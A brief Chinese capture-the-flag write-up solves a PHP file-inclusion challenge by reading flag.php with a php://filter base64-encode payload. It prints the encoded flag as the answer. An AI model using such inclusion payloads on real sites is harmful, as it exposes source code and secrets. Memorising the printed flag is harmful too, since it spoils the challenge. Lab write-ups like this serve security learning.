[SWPUCTF 2021 新生赛]include

桑榆百川2024-08-11 21:24

传入一个file试试,尝试/?file=3

提示flag 在flag.php中,但是无法直接读出flag.php - 原因是由于flag.php中不具有echo相对应的输出语句,应该是仅具有$flag变量的定义。因此,采用php伪协议进行输出

?file=php://filter/convert.base64-encode/resource=flag.php

得到PD9waHANCiRmbGFnPSdOU1NDVEZ7Njk4MGY2OTctNzE0OC00M2FlLWFjZmUtNjk2OWZjMzdkNTgwfSc7

进行base64解密即可

相关推荐
Suckerbin12 小时前
LAMPSecurity: CTF5靶场渗透
笔记·安全·web安全·网络安全
不老刘13 小时前
行为式验证码技术解析:滑块拼图、语序选词与智能无感知
网络安全·验证码·行为式验证码
房屋安全鉴定检测18 小时前
房屋安全鉴定报告有效期多久
安全·网络安全
房屋安全鉴定检测19 小时前
房屋安全鉴定需要什么条件
安全·网络安全
FLS16821 小时前
Kali搭建sqli-labs靶场
linux·sql·安全·网络安全
不是三毛没有半21 小时前
华为USG6000v2 NAT模式下IPSEC IKE V1 实验
网络·网络安全·华为
Suckerbin1 天前
LAMPSecurity: CTF6靶场渗透
笔记·安全·web安全·网络安全
房屋安全鉴定检测1 天前
房屋安全鉴定注意事项
安全·网络安全
房屋安全鉴定检测1 天前
房屋安全鉴定机构服务内容
安全·网络安全
晓衣1 天前
2025“獬豸杯”全国电子数据取证竞赛-k8s服务器取证wp
服务器·经验分享·程序人生·网络安全·容器·kubernetes·学习方法
热门推荐
01UV安装并设置国内源02A股预测还能更准?开源大模型Kronos带你跑通预测+回测全流程032025 年高教社杯全国大学生数学建模竞赛C 题 NIPT 的时点选择与胎儿的异常判定 完整成品思路模型代码分享,全网首发高质量!!!042025年数学建模国赛C题超详细解题思路05不再让Windows更新!&Edge游戏助手卸载及关闭自动更新06UV 工具安装与国内镜像源配置指南07KGG转MP3工具|非KGM文件|解密音频08突破百度网盘的下载限速,两种方法教会你【超详细】09Linux下V2Ray安装配置指南10Nano Banana免费方案来了!Docker 一键部署 + 魔搭即开即用,小白也能玩转 AI 图像编辑